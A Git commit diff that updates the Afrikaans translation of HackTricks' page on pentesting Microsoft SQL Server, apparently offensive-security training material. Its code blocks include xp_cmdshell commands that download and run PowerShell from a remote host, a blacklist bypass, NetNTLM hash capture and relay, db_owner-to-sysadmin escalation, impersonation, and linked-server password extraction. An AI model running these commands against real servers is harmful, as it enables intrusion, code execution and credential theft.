Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 04:33:28 +00:00
Code Issues Projects Releases Packages Wiki Activity

Translated ['network-services-pentesting/pentesting-mssql-microsoft-sql-

Browse source
This commit is contained in:
Translator 2024-06-03 13:37:10 +00:00
parent fdf96e3257
commit 115a424b8a
1 changed files with 30 additions and 30 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

60
network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
View file

@ -2,14 +2,14 @@
<details>
<summary><strong>Leer AWS hak vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Ander maniere om HackTricks te ondersteun:
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat** Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)!
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai** Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**Die PEASS Familie**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Deel jou haktruuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>
@ -24,7 +24,7 @@ Ander maniere om HackTricks te ondersteun:
## Basiese Inligting
Van [wikipedia](https://en.wikipedia.org/wiki/Microsoft\_SQL\_Server):
Vanaf [wikipedia](https://en.wikipedia.org/wiki/Microsoft\_SQL\_Server):
> **Microsoft SQL Server** is 'n **relasionele databasis**-bestuurstelsel wat deur Microsoft ontwikkel is. As 'n databasisbediener is dit 'n sagtewareproduk met die primêre funksie om data te stoor en op te haal soos versoek deur ander sagtewaretoepassings—wat óf op dieselfde rekenaar óf op 'n ander rekenaar oor 'n netwerk (insluitend die Internet) kan hardloop.\\
@ -32,25 +32,25 @@ Van [wikipedia](https://en.wikipedia.org/wiki/Microsoft\_SQL\_Server):
```
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
```
### **Verstek MS-SQL Stelsel Tabelle**
### **Verstek MS-SQL-stelseltabelle**
* **meester Databasis**: Hierdie databasis is noodsaaklik omdat dit alle stelselvlak besonderhede vir 'n SQL Server instansie vasvang.
* **msdb Databasis**: SQL Server Agent maak gebruik van hierdie databasis om skedulering vir waarskuwings en take te bestuur.
* **model Databasis**: Tree op as 'n bloudruk vir elke nuwe databasis op die SQL Server instansie, waar enige veranderings soos grootte, sortering, herstelmodel, en meer nageboots word in nuut geskepte databasisse.
* **Hulpbron Databasis**: 'n Slegs-lees databasis wat stelselvoorwerpe huisves wat met SQL Server kom. Hierdie voorwerpe, alhoewel fisies gestoor in die Hulpbron databasis, word logies voorgestel in die sys skema van elke databasis.
* **tempdb Databasis**: Dien as 'n tydelike stoorplek vir tydelike voorwerpe of tussenliggende resultaatsets.
* **meesterdatabasis**: Hierdie databasis is noodsaaklik omdat dit alle stelselvlakbesonderhede vir 'n SQL Server-instantie vasvang.
* **msdb-databasis**: SQL Server Agent maak gebruik van hierdie databasis om skedulering vir waarskuwings en take te bestuur.
* **modeldatabasis**: Tree op as 'n bloudruk vir elke nuwe databasis op die SQL Server-instantie, waar enige veranderings soos grootte, kolleksie, herstelmodel, en meer in nuutgeskepte databasisse weerspieël word.
* **Hulpbron-databasis**: 'n Slegs-lees-databasis wat stelselvoorwerpe huisves wat met SQL Server kom. Hierdie voorwerpe, alhoewel fisies in die Hulpbron-databasis gestoor word, word logies voorgestel in die sys-skema van elke databasis.
* **tempdb-databasis**: Dien as 'n tydelike stoorplek vir oorgangsvoorwerpe of tussentydse resultaatreeks.
## Opsomming
### Outomatiese Opsomming
As jy niks weet van die diens nie:
As jy niks van die diens weet nie:
```bash
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
msf> use auxiliary/scanner/mssql/mssql_ping
```
{% hint style="info" %}
As jy **nie geloofsbriewe het** nie, kan jy probeer om hulle te raai. Jy kan nmap of metasploit gebruik. Wees versigtig, jy kan rekeninge **blokkeer** as jy misluk om 'n paar keer in te teken met 'n bestaande gebruikersnaam.
As jy **nie geloofsbriewe het nie** kan jy probeer om hulle te raai. Jy kan nmap of metasploit gebruik. Wees versigtig, jy kan rekeninge **blokkeer** as jy verskeie kere misluk om in te teken met 'n bestaande gebruikersnaam.
{% endhint %}
#### Metasploit (benodig geloofsbriewe)
@ -154,12 +154,12 @@ SELECT * FROM sysusers
1. **Beveiligbaar:** Gedefinieer as die bronne wat deur SQL Server bestuur word vir toegangsbeheer. Hierdie word gekategoriseer in:
* **Bediener** - Voorbeelde sluit databasisse, aanmeldings, eindpunte, beskikbaarheidsgroepe, en bedienersrolle in.
* **Databasis** - Voorbeelde dek databasisrol, toepassingsrolle, skema, sertifikate, volledige tekskatalogusse, en gebruikers.
* **Databasis** - Voorbeelde dek databasisrolle, aansoekrolle, skema, sertifikate, volledige tekskatalogusse, en gebruikers.
* **Skema** - Sluit tabelle, aansigte, prosedures, funksies, sinonieme, ens. in.
2. **Toestemming:** Verbonde met SQL Server beveiligbares, toestemmings soos ALTER, BEHEER, en SKEP kan aan 'n hoofakteur toegeken word. Bestuur van toestemmings vind op twee vlakke plaas:
2. **Toestemming:** Verbonde met SQL Server beveiligbares, toestemmings soos ALTER, BEHEER, en SKEP kan aan 'n hoof toegestaan word. Bestuur van toestemmings vind op twee vlakke plaas:
* **Bedienervlak** deur gebruik van aanmeldings
* **Databasisvlak** deur gebruik van gebruikers
3. **Hoofakteur:** Hierdie term verwys na die entiteit wat toestemming verleen word tot 'n beveiligbare. Hoofakteurs sluit hoofaantekeninge en databasisgebruikers hoofsaaklik in. Die beheer oor toegang tot beveiligbares word uitgeoefen deur die toekennen of ontkenning van toestemmings of deur die insluiting van aanmeldings en gebruikers in rolle toegerus met toegangsregte.
3. **Hoof:** Hierdie term verwys na die entiteit wat toestemming verleen word tot 'n beveiligbare. Hoofsaaklik sluit hoofde aanmeldings en databasisgebruikers in. Die beheer oor toegang tot beveiligbares word uitgeoefen deur die verlening of ontkenning van toestemmings of deur aanmeldings en gebruikers in rolle op te neem wat toegangsregte het.
```sql
# Show all different securables names
SELECT distinct class_desc FROM sys.fn_builtin_permissions(DEFAULT);
@ -179,7 +179,7 @@ SELECT IS_SRVROLEMEMBER('sysadmin');
Use master
EXEC sp_helprotect 'xp_cmdshell'
```
## Sluike metodes
## Truuks
### Voer OS-opdragte uit
@ -217,7 +217,7 @@ EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.1
# Bypass blackisted "EXEC xp_cmdshell"
'; DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net' —
```
### Steel NetNTLM-hash / Oorplasing aanval
### Steel NetNTLM-hash / Relay-aanval
Jy moet 'n **SMB-bediener** begin om die hash wat in die verifikasie gebruik word, vas te vang (`impacket-smbserver` of `responder` byvoorbeeld).
```bash
@ -258,7 +258,7 @@ Jy kan sien hoe om hierdie gereedskap te gebruik in:
### **Skryf Lêers**
Om lêers te skryf met behulp van `MSSQL`, moet ons **Ole Automation Procedures** aktiveer, wat admin-voorregte vereis, en dan sekere gestoorde prosedures uitvoer om die lêer te skep:
Om lêers te skryf met behulp van `MSSQL`, **moet ons** [**Ole Automation Procedures**](https://docs.microsoft.com/en-us/sql/database-engine/configure-windows/ole-automation-procedures-server-configuration-option) **aktiveer**, wat admin-voorregte vereis, en dan sekere gestoorde prosedures uitvoer om die lêer te skep:
```bash
# Enable Ole Automation Procedures
sp_configure 'show advanced options', 1
@ -295,7 +295,7 @@ https://vuln.app/getItem?id=1+and+1=(select+x+from+OpenRowset(BULK+'C:\Windows\w
MSSQL kan jou toelaat om **skripte in Python en/of R** uit te voer. Hierdie kode sal uitgevoer word deur 'n **verskillende gebruiker** as die een wat **xp\_cmdshell** gebruik om bevele uit te voer.
Voorbeeld om 'n **'R'** _"Hellow World!"_ **wat nie werk nie** uit te voer:
Voorbeeld van 'n poging om 'n **'R'** _"Hellow World!"_ **wat nie werk nie** uit te voer:
![](<../../.gitbook/assets/image (393).png>)
@ -315,9 +315,9 @@ GO
```
### Lees Register
Microsoft SQL Server bied **verskeie uitgebreide gestoorde prosedures** wat jou in staat stel om te interakteer met nie net die netwerk nie, maar ook die lêersisteem en selfs die [**Windows Register**](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/)**:**
Microsoft SQL Server bied **verskeie uitgebreide gestoorde prosedures** wat jou toelaat om te interakteer met nie net die netwerk nie, maar ook die lêersisteem en selfs die [**Windows Register**](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server)**:**
| **Gewone** | **Instansie-bewus** |
| **Gewone** | **Instansie-Bewus** |
| ---------------------------- | -------------------------------------- |
| sys.xp\_regread | sys.xp\_instance\_regread |
| sys.xp\_regenumvalues | sys.xp\_instance\_regenumvalues |
@ -352,9 +352,9 @@ Daar is ander metodes om opdrag uit te voer, soos die byvoeging van [uitgebreide
## MSSQL Voorregverhoging
### Vanaf db\_owner tot sysadmin
### Van db\_owner tot sysadmin
As 'n **gewone gebruiker** die rol **`db_owner`** oor die **databasis wat deur 'n admin besit word** (soos **`sa`**) gegee word en daardie databasis is ingestel as **`trustworthy`**, kan daardie gebruiker hierdie voorregte misbruik om te **voorregverhoging** omdat **gestoorde prosedures** wat daar geskep is, kan **uitgevoer** word as die eienaar (**admin**).
As 'n **gewone gebruiker** die rol **`db_owner`** oor die **databasis wat deur 'n admin besit word** (soos **`sa`**) gegee word en daardie databasis is ingestel as **`trustworthy`**, kan daardie gebruiker hierdie voorregte misbruik vir **voorregverhoging** omdat **gestoorde prosedures** wat daar geskep is, kan **uitgevoer** as die eienaar (**admin**).
```sql
# Get owners of databases
SELECT suser_sname(owner_sid) FROM sys.databases
@ -417,9 +417,9 @@ SELECT IS_SRVROLEMEMBER('sysadmin')
```
{% hint style="info" %}
As jy 'n gebruiker kan impersoneer, selfs as hy nie 'n sysadmin is nie, moet jy nagaan of die gebruiker toegang het tot ander databasisse of gekoppelde bedieners.
{% endhint %}
Merk op dat sodra jy 'n sysadmin is, kan jy enige ander een impersoneer:
Merk op dat sodra jy sysadmin is, kan jy enige ander een impersoneer:
{% endhint %}
```sql
-- Impersonate RegUser
EXECUTE AS LOGIN = 'RegUser'
@ -433,7 +433,7 @@ Jy kan hierdie aanval uitvoer met 'n **metasploit** module:
```bash
msf> auxiliary/admin/mssql/mssql_escalate_execute_as
```
of met 'n **PS** skrip:
of met 'n **PS** skrips:
```powershell
# https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Invoke-SqlServer-Escalate-ExecuteAs.psm1
Import-Module .Invoke-SqlServer-Escalate-ExecuteAs.psm1
@ -445,7 +445,7 @@ Invoke-SqlServer-Escalate-ExecuteAs -SqlServerInstance 10.2.9.101 -SqlUser myuse
## Uithaling van wagwoorde vanaf SQL Server Gekoppelde Bedieners
'n Aanvaller kan SQL Server Gekoppelde Bedieners se wagwoorde uithaal uit die SQL-instansies en hulle in die teks sien, wat die aanvaller wagwoorde gee wat gebruik kan word om 'n groter voet aan die teiken te kry. Die skrif om die wagwoorde wat vir die Gekoppelde Bedieners gestoor word, te onttrek en te dekripteer, kan [hier](https://www.richardswinbank.net/admin/extract\_linked\_server\_passwords) gevind word.
'n Aanvaller kan SQL Server Gekoppelde Bedieners se wagwoorde uithaal uit die SQL-instansies en hulle in teksformaat kry, wat die aanvaller wagwoorde gee wat gebruik kan word om 'n groter voet aan die teiken te kry. Die skriffie om die wagwoorde wat vir die Gekoppelde Bedieners gestoor word, te onttrek en te dekripteer, kan [hier](https://www.richardswinbank.net/admin/extract\_linked\_server\_passwords) gevind word.
Sekere vereistes en konfigurasies moet gedoen word sodat hierdie uitbuiting kan werk. Eerstens moet jy Administrateur-regte op die masjien hê, of die vermoë om die SQL Server-konfigurasies te bestuur.
@ -455,13 +455,13 @@ Nadat jou regte geverifieer is, moet jy drie dinge konfigureer, naamlik:
2. Voeg 'n Beginparameter by, in hierdie geval sal 'n spoorvlag bygevoeg word, naamlik -T7806.
3. Skakel afstandbeheerverbinding in.
Om hierdie konfigurasies outomaties te maak, het [hierdie bewaarplek](https://github.com/IamLeandrooooo/SQLServerLinkedServersPasswords/) die benodigde skripte. Benewens 'n Powershell-skrip vir elke stap van die konfigurasie, het die bewaarplek ook 'n volledige skrip wat die konfigurasietskripte en die uithaling en dekriptering van die wagwoorde kombineer.
Om hierdie konfigurasies te outomatiseer, het [hierdie bewaarplek](https://github.com/IamLeandrooooo/SQLServerLinkedServersPasswords/) die benodigde skripte. Benewens 'n Powershell-skrip vir elke stap van die konfigurasie, het die bewaarplek ook 'n volledige skrip wat die konfigurasietskripte en die uithaling en dekriptering van die wagwoorde kombineer.
Vir verdere inligting, verwys na die volgende skakels oor hierdie aanval: [Decrypting MSSQL Database Link Server Passwords](https://www.netspi.com/blog/technical/adversary-simulation/decrypting-mssql-database-link-server-passwords/)
[Troubleshooting the SQL Server Dedicated Administrator Connection](https://www.mssqltips.com/sqlservertip/5364/troubleshooting-the-sql-server-dedicated-administrator-connection/)
## Plaaslike Bevoorregtingseskalasie
## Plaaslike Bevoorregte Eskalasie
Die gebruiker wat MSSQL-bediener hardloop, sal die bevoorregtingsteken **SeImpersonatePrivilege** geaktiveer hê.\
Jy sal waarskynlik kan **eskaleer na Administrateur** deur een van hierdie 2 bladsye te volg:
@ -560,6 +560,6 @@ Ander maniere om HackTricks te ondersteun:
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**Die PEASS-familie**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>